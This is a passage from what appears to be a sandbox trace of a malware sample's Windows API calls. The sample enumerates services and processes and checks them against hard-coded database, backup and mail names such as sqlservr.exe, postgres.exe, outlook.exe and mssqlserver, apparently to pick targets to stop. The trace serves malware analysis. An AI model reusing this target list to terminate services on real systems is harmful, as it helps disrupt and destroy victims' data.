(lpString="MMCSS") returned 5 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0043.862] lstrlenW (lpString="MpsSvc") returned 6 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0043.862] lstrlenW (lpString="Netman") returned 6 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0043.862] lstrlenW (lpString="netprofm") returned 8 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0043.862] lstrlenW (lpString="NlaSvc") returned 6 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0043.863] lstrlenW (lpString="nsi") returned 3 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0043.863] lstrlenW (lpString="PcaSvc") returned 6 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0043.863] lstrlenW (lpString="PlugPlay") returned 8 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0043.863] lstrlenW (lpString="Power") returned 5 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0043.863] lstrlenW (lpString="ProfSvc") returned 7 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0043.863] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0043.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0043.863] lstrlenW (lpString="RpcEptMapper") returned 12 [0043.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0043.864] lstrlenW (lpString="RpcSs") returned 5 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0043.864] lstrlenW (lpString="SamSs") returned 5 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0043.864] lstrlenW (lpString="Schedule") returned 8 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0043.864] lstrlenW (lpString="SENS") returned 4 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0043.864] lstrlenW (lpString="ShellHWDetection") returned 16 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0043.864] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0043.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0043.864] lstrlenW (lpString="Spooler") returned 7 [0043.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0043.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0043.864] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0043.865] lstrlenW (lpString="swprv") returned 5 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0043.865] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0043.865] lstrlenW (lpString="SysMain") returned 7 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.865] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.865] lstrlenW (lpString="Themes") returned 6 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0043.865] lstrlenW (lpString="TrkWks") returned 6 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0043.865] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0043.865] lstrlenW (lpString="UxSms") returned 5 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0043.865] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0043.865] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0043.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0043.865] lstrlenW (lpString="VSS") returned 3 [0043.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0043.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0043.866] lstrlenW (lpString="WdiServiceHost") returned 14 [0043.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0043.866] lstrlenW (lpString="WdiSystemHost") returned 13 [0043.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0043.866] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0043.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0043.866] lstrlenW (lpString="Winmgmt") returned 7 [0043.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0043.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0043.866] lstrlenW (lpString="WPDBusEnum") returned 10 [0043.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0043.866] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0043.866] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0043.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0043.866] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0043.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x168 [0043.869] Process32FirstW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0043.869] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0043.870] lstrlenW (lpString="System") returned 6 [0043.870] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0043.870] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0043.870] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0043.871] lstrlenW (lpString="smss.exe") returned 8 [0043.871] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0043.871] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0043.871] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.871] lstrlenW (lpString="csrss.exe") returned 9 [0043.872] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0043.872] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0043.872] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0043.872] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0043.872] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0043.872] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0043.872] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0043.872] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0043.872] lstrlenW (lpString="wininit.exe") returned 11 [0043.872] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0043.872] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0043.872] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0043.873] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0043.873] lstrlenW (lpString="csrss.exe") returned 9 [0043.873] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0043.874] lstrlenW (lpString="winlogon.exe") returned 12 [0043.874] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0043.875] lstrlenW (lpString="services.exe") returned 12 [0043.875] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0043.875] lstrlenW (lpString="lsass.exe") returned 9 [0043.875] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0043.876] lstrlenW (lpString="lsm.exe") returned 7 [0043.876] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.877] lstrlenW (lpString="svchost.exe") returned 11 [0043.877] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.877] lstrlenW (lpString="svchost.exe") returned 11 [0043.877] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.878] lstrlenW (lpString="svchost.exe") returned 11 [0043.878] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.879] lstrlenW (lpString="svchost.exe") returned 11 [0043.879] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.879] lstrlenW (lpString="svchost.exe") returned 11 [0043.879] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0043.880] lstrlenW (lpString="audiodg.exe") returned 11 [0043.880] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.881] lstrlenW (lpString="svchost.exe") returned 11 [0043.881] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.881] lstrlenW (lpString="svchost.exe") returned 11 [0043.881] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.882] lstrlenW (lpString="dwm.exe") returned 7 [0043.882] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.883] lstrlenW (lpString="explorer.exe") returned 12 [0043.883] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.883] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.883] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.884] lstrlenW (lpString="taskhost.exe") returned 12 [0043.884] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.885] lstrlenW (lpString="svchost.exe") returned 11 [0043.885] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0043.885] lstrlenW (lpString="taskeng.exe") returned 11 [0043.886] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.886] lstrlenW (lpString="taskhost.exe") returned 12 [0043.886] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0043.887] lstrlenW (lpString="called.exe") returned 10 [0043.887] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0043.887] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0043.887] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0043.888] lstrlenW (lpString="analyst.exe") returned 11 [0043.888] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0043.889] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0043.889] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0043.890] lstrlenW (lpString="wages.exe") returned 9 [0043.890] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0044.026] lstrlenW (lpString="rand.exe") returned 8 [0044.026] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 